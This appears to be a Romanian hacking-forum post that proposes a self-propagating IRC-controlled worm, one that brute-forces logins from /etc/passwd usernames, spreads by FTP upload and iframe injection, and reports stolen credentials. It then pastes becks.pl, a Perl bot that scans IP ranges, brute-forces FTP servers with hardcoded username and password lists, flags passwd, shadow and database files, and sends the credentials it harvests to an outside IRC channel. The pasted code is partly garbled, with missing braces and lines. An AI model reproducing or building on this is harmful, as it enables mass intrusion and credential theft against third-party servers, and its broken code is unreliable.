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[Idea] Self-spreading Bute/IRCbot Web spider

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sunt curios cam cat de greu ar fi sa faci un script(nu conteaza lb) automat care sa integreze, un simple irc bot(php/py/jv/pl) cu unix cmds + simple brute din cat /etc/passwd gather users.txt si brute with w.lst(external sau internal cu @usernames = qw(Admin,etc,etc) @passwords = qw(password,etc,etc) , dar odata ce prinde o gaura lafel sa intre mai departe si sa repete procesul, fie ca e unix sau windows via ftpcmd cu open 123.x.x.x user pass put autobot.w/e, normal plecand de la baza ca e ftp si modici o fila deja existenta, adaugand un iframe care sa porneasca autobot.w/e cu avand un refresh de 12h sau 24h

de pref sendmail cu local/ip user pass folosit si url catre dupa succ

pros; nicio conn directa intre tine si host, command via irc din channel sau priv, stealth, optional poti sa adagi un shell in caz ca primesti mail de succ dar botul nu vine pe canalul x, macar ai url dar de aici se complica prea rau tocmai de asta ar fi mai bine sa ramana doar irc bot-ul

cons; mai greu de facut sync intre boti

astept ideii si/sau sugestii

Edited by SnaK3

# Hollow Chocolate Bunnies From Hell
# presenting
# becks.pl - FTP scanner by softxor
# Version 0.9
# becks.pl is an IRC bot that scans for anonymous FTP servers or FTP's witth easy to break
# password protection and posts the contents (if anonymous login) or the login data to a specific Channel
# usage: ./ftp_scan 132.311.0.0
# Greets fly out to: rembrandt, kamooo, evil, zera, litestar, #milw0rm
# Contact:
# - WWW: [Solo usuarios registrados pueden ver los links. ]
# - MAIL: insertnamehere at gmx dot de
# - IRC: #hcbfh @ irc.milw0rm.com
# NOTE: This bot has been written just for fun. If you can't get it running, it's better that
# Yet to come:
# extern pass/userfile

use strict;
use warnings;
use Net::FTP;

# Global Configuration #
my %config = (max_childs => 40, # Maximal parallel process (recomended up to 100)
logging => 1, # If 1, then enable logging
use_brute_force => 0, # If 0, then scans only for anonymous ftps
indexing => 1, # If 1, creates for every accessed ftp a file with the contents of that ftpd
anon_email => 'bleh@blah.co.uk', # Email Address to use in anonymous checking
timeout => 1, # Connection timeout in seconds
passfile => '', # Missing/not implemented in this version
userfile => ''); # Missing/not implemented in this version

IRC settings #
my %irc = (enabled => 1, # 1 for enable IRC bot
server => 'irc.indoirc.net',
port => 6667,
nickname => 'ftpbotsz',
username => 'ftpbotsz ftpbotsz ftbotsz ftpbotsz', # Yes it has to be four times
channel => '#hcbfh',
nickserv => ''); # Nickserv password

# Data for brute forcing attack #
my @usernames = qw(Administrator upload admin web webmaster user root ftp);

my @passwords = qw(password qwertz asdf test test123 1234 1111 12 345678 4321 12345678 123456 secret letmein upload pass support passwort god love 007 admin knight wizard letmein test administrator root web webmaster ftp);

# Global declarations
my $childs = 0;

# Mirc colors
my %colors =
(white => "\x030",
red => "\x034",
green => "\x033",
gray => "\x0314",
yellow=> "\x038",
blue => "\x0312",
cyan => "\x0311",
orange=> "\x0307");

# Parse teh argument!
my($ipa, $ipb, $ipc, $ipd) = ($ARGV[0] =~ m/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) or die("Append start IP.\n");


sub main {

# Start IRC notifying process
if ($irc{'enabled'} == 1) {
pipe(IN, OUT) || die "Can't create pipe....\n";


if (!fork) {
} else {
close IN;

sleep(30); # needed to let the IRC process join the channel

close IN;

print "Start scanning...\nBe patient.\n";

my $OUTPUT_AUTOFLUSH = 1; # To avoid buffering problems with fork()

# loop through IPs
while (1) {
for my $a ($ipa..255) {

if ($a == 10 || $a == 198 || $a == 127 || $a == 0 || $a == 172 || $a == 1) {

for my $b ($ipb..255) {
for my $c ($ipc..255) {
for my $d ($ipd..255) {

if (fork() == 0) {
#print "$a.$b.$c.$d\n"; # Uncomment for verbose output
} else {
if ($childs >= $config{'max_childs'}) {

} # end $d
} # end $c
} # end $b
} #end $a

} # end while

} #end main()

# gets the content of a dir by
sub get_dir {

my ($cur_dir, $ftp) = @_;
my ($content, @found_files, $write, @dirs);
$content = ''; # needed
my %data_types = (mpg => 'Video',
avi => 'Video',
xvid=> 'DivX',
divx=> 'DivX',
mp3 => 'Music',
ogg => 'Music',
sql => 'MySQL',
xxx => 'Pr0n',
pdf => 'Pdf',
jpg => 'Pictures',
gif => 'Pictures',
zip => 'Zip',
ace => 'Ace',
rar => 'Rar',
exe => 'Exe',
txt => 'Txt',
passwd => 'passwd',
shadow => 'shadow',
htm => 'HTML',
=> 'AccessDB',
bak => 'Backup',
xls => 'Excel Sheet');

my @files = $ftp->dir;

if ($cur_dir eq '/') {
$write = &test_write($ftp);

# $_ isnt working here, because of validity conflicts
foreach my $file (@files) {

if ($file eq '.' || $file eq '..') {

if ($file =~ m/^d[rwx-].*\d\s(.*?)$/) {
push (@dirs, $1);
} else {

# find interesting content
foreach my $type (keys %data_types) {
if ($file =~ m/$type$/gi) {
push (@found_files, $data_types{$type});


} # end for each

while(my $cur = pop(@dirs)) {
if ($cur_dir eq '/') {
$content .= &get_dir('/'.$cur, $ftp);
} else {

$content .= &get_dir($cur_dir.'/'.$cur, $ftp);

@found_files = &del_double(@found_files);

foreach my $files (@found_files) {
$content .= $files.' ';

if ($write) {
$content .= "$colors{'red'}Write-Enabled";

return $content;


sub scan {

my ($host) = @_;

my $ftp = Net::FTP->new($host,Timeout=>$config{'timeout'}) or return;

# grab banner
my $banner = $ftp->message;
$banner =~ s/\n/ /g;

# Anonymous checker
if ($ftp->login('anonymous', $config{'anon_email'})) {

if ($config{'logging'}) {
open(LOG, ">anonymous.log");
} else {
open(LOG, '>-');

if ($config{'indexing'}) {
my $content = &get_dir("/", $ftp);

if($irc{'enabled'}) {

if ($content ne '') {
print OUT "$colors{'white'}Anonymous FTP: $colors{'orange'}ftp://$host/ $colors{'white'}Content: $colors{'yellow'}$content$colors{'white'}Banner: $colors{'orange'}$banner\n";
} else {
print OUT "$colors{'white'}Anonymous FTP: $colors{'orange'}ftp://$host/ $colors{'white'}Banner: $colors{'orange'}$banner\n";

} #end irc

print LOG "ftp://$host/ Content: $content Banner: $banner\n"

} else {

if($irc{'enabled'}) {
print OUT "$colors{'white'}Anonymous FTP: ftp://$host/ Banner: $colors{'orange'}$banner\n";

print LOG "ftp://$host/ Banner: $banner\n"




} # end anonymous

# if you're not willing, you'll never grow old!
if ($config{'use_brute_force'}) {

foreach my $user (@usernames) {
foreach my $pass (@passwords) {
if($ftp->login($user, $pass)) {

if ($config{'logging'}) {
open(LOG, ">protected.log");
} else {
open(LOG, '>-');

if($irc{'enabled'}) {
print OUT "$colors{'red'}ftp://$user:$pass\@$host/ $colors{'white'}banner: $colors{'orange'}$banner\n";

print LOG "ftp://$user:$pass\@$host/\n";



} else {
} # end brute force


# paste incoming ftps on the irc channel
sub irc_notify {

print "Staring IRC client\n";

close OUT;

my $con =
Timeout=>'30') or die("Error: IRC handler cannot connect\n");

if(fork) {
# waiting for new ftps, to give them out
while (my $answer = <$con>) {

if($answer =~ m/^PING \.*?)$/gi) {
print $con "PONG :".$1."\n";



print $con "USER $irc{'username'}\r\n";
print $con "NICK $irc{'nickname'}\r\n";

print $con "JOIN $irc{'channel'}\r\n";
print "IRC client is running.\n";

if ($irc{'nickserv'}) {
print $con "privmsg nickserv IDENTIFY $irc{'nickserv'}\r\n";

# make sure we dont ping out
while (my $ftp = <IN>) {
print $con "privmsg $irc{'channel'} :$ftp\r\n";

close $con;

# test if ftp is write enabled
# return 1 if writing is allowed,
# 0 if permitted
sub test_write {
my $ftp = $_[0];

if ($ftp->mkdir("test")) {
$ftp->rmdir("test"); # we want to be 'polite'
return 1;

return 0;

# deletes double entries in an array
sub del_double {
my %all;

grep { $all {$_} = 0} @_;

return (keys %all);

ceva de genul asta dar nu vreau exec, ci direct php, ptr ca perl execs sunt vizibile/detectabile si n ar avea nici un sens

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